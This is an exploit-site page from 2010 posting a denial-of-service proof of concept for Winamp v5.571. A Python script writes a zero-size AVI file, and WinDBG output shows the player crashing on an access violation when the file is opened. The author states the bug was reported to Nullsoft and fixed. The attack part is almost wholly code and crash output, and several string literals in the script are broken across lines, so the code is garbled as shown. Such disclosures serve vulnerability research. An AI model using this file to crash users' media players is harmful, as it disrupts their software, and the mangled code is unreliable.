Home / os / win7

Winamp v5.571 Malicious AVI Denial of Service

Posted on 28 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Winamp v5.571 Malicious AVI Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================
Winamp v5.571 Malicious AVI Denial of Service
=============================================


# Tested on Windows 7 and Winamp v5.571(x86)
# This bug is informed to Nullsoft and was fixed long back.
# The status can be found at http://forums.winamp.com/showthread.php?s=&amp;threadid=316000
# This code works on Python 3.0. To make it work on &lt;3.0 remove braces in print
 
print(&quot;
***Winamp v5.571 malicious AVI file handling DoS Vulnerability***
&quot;)
 
try:
        open('winampcrash.avi', 'w')
        print (&quot;Creating malicious AVI file . . . 
&quot;)
        print (&quot;Successfully created Zero size AVI file
&quot;)
        print (&quot;Open created Zero size AVI file in Winamp.....Boom

&quot;)
except IOError:                    
        print (&quot;Unable to create Zero size AVI file
&quot;)
         
 
 
 
 
&quot;&quot;&quot;
Following is the WinDBG status when we open winampcrash.AVI file in Winamp v5.571(x86)
 
(f00.e60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=0886fe68 edi=02880618
eip=076243f1 esp=0886fc50 ebp=0886ff28 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
in_AVI!winampGetInModule2+0x13da:
076243f1 8b4008          mov     eax,dword ptr [eax+8] ds:002b:00000008=????????
 
 
&quot;&quot;&quot;
 
 
#Best Regards,
#Praveen Darshanam


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :